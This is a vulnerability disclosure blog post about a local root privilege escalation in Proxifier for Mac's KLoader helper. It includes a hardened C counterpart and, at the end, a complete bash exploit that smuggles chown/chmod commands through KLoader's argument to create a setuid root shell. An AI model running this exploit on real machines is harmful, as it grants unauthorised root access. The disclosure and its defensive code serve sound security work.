# Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html

Proxifier 2.18 (also 2.17 and possibly some earlier versions) ships with a
KLoader binary which it installs suid root the first time Proxifier is run. This
binary serves a single purpose, which is to load and unload Proxifier's kernel
extension.

Unfortunately it does this by taking the first parameter passed to it on the
command line without any sanitisation and feeding it straight into system().

This means not only can you load any arbitrary kext as a non-root user but you
can also get a local root shell.

Although this is a bit of a terrible bug that shouldn't be happening in 2017,
Proxifier's developers fixed the issue in record time so that's something!

Everyone using Proxifier for Mac should update to 2.19 as soon as possible.

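The defensive counterpart to this bug class, as an added example (not Proxifier's code and not from the original advisory): a setuid helper that accepts only a fixed keyword and runs the kext tool through execve() with no shell. KEXT_PATH, build_argv and run_action are hypothetical names chosen for illustration; /sbin/kextload and /sbin/kextunload are the stock macOS tools.

```c
/* Added example: hardened shape for a setuid kext-loader helper.
 * KEXT_PATH is a hypothetical placeholder, not Proxifier's real path. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define KEXT_PATH "/Library/Extensions/Example.kext" /* hypothetical */

/* Bug class from the advisory, for contrast: text taken from argv[1] is
 * handed to system(), so /bin/sh parses caller-controlled input as root. */
/* Map a fixed keyword to a fixed argument vector; the caller never supplies
 * a path or command text. Returns 0 on success, -1 if not on the allowlist. */
int build_argv(const char *action, const char *out[3])
{
    if (action == NULL) return -1;
    if (strcmp(action, "load") == 0)        out[0] = "/sbin/kextload";
    else if (strcmp(action, "unload") == 0) out[0] = "/sbin/kextunload";
    else return -1;
    out[1] = KEXT_PATH;
    out[2] = NULL;
    return 0;
}

/* Execute the tool directly: absolute path, no shell, empty environment. */
int run_action(const char *action)
{
    const char *args[3];
    char *const envp[] = { NULL };
    pid_t pid; int status;

    if (build_argv(action, args) != 0) return -1;
    pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(args[0], (char *const *)args, envp);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc == 2 && run_action(argv[1]) == 0) return 0;
    fprintf(stderr, "loader: expected 'load' or 'unload', or the tool failed\n");
    return 1;
}
```

Because the argument is compared against an allowlist and never concatenated into a command string, shell metacharacters in it have no effect: anything other than the two keywords is rejected before a process is created.
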
https://m4.rkw.io/proxifier_privesc.sh.txt
6040180f672a2b70511a483e4996d784f03e04c624a8c4e01e71f50709ab77c3
-------------------------------------------------------------------

#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.18                                           #
#####################################################################
# by m4rkw                                                          #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
  setuid(0);
  seteuid(0);

  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF

gcc -o /tmp/a a.c
rm -f a.c
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a'
/tmp/a

-------------------------------------------------------------------